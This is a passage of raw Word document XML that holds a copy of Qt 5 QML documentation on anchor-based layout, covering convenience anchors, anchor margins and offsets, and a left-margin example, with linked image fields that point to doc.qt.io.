          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> rect3</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> x</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>150</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/edge4.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png"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"http://doc.qt.io/qt-5/images/edge4.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1063" type="#_x0000_t75" alt="" style="width:324.3pt;height:78.9pt">
            <v:imagedata r:id="rId2316" r:href="rId2317"/>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251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are also some </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convenience anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchors.fill</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a convenience that is the same as setting the left,right,top and bottom anchors to the left,right,top and bottom of the target item. </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchors.centerIn</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is another convenience anchor, and is the same as setting the verticalCenter and horizontalCenter anchors to the verticalCenter and horizontalCenter of the target item.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00D1065E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1966" w:name="anchor-margins-and-offsets"/>
      <w:bookmarkStart w:id="1967" w:name="_Toc483000956"/>
      <w:bookmarkStart w:id="1968" w:name="_Toc483003947"/>
      <w:bookmarkStart w:id="1969" w:name="_Toc483604299"/>
      <w:bookmarkStart w:id="1970" w:name="_Toc483605519"/>
      <w:bookmarkEnd w:id="1966"/>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anchor Margins and Offsets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1967"/>
      <w:bookmarkEnd w:id="1968"/>
      <w:bookmarkEnd w:id="1969"/>
      <w:bookmarkEnd w:id="1970"/>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The anchoring system also allows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>margins</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to be specified for an item's anchors. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Margins specify the amount of empty space to leave to the outside of an item's anchor</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">offsets </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow positioning to be manipulated using the center anchor lines</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. An item can specify its anchor margins individually </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>through</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2318" w:anchor="anchors.leftMargin-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>leftMargin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2319" w:anchor="anchors.rightMargin-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>rightMargin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2320" w:anchor="anchors.topMargin-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>topMargin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2321" w:anchor="anchors.bottomMargin-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>bottomMargin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, or use</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2322" w:anchor="anchors.margins-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>anchors.margins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to specify the same margin value for all four edges. </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t xml:space="preserve">Anchor offsets are specified </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2323" w:anchor="anchors.horizontalCenterOffset-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>horizontalCenterOffset</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2324" w:anchor="anchors.verticalCenterOffset-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>verticalCenterOffset</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2325" w:anchor="anchors.baselineOffset-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>baselineOffset</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/margins_qml.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png"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"http://doc.qt.io/qt-5/images/margins_qml.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1064" type="#_x0000_t75" alt="" style="width:374.4pt;height:187.2pt">
            <v:imagedata r:id="rId2326" r:href="rId2327"/>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251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The following </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifies a left margin:</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id</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rect1</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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id</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rect2</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rect1</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right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leftMargin</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this case, a margin of 5 pixels is reserved to the left of</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rect2</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, producing the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/edge2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
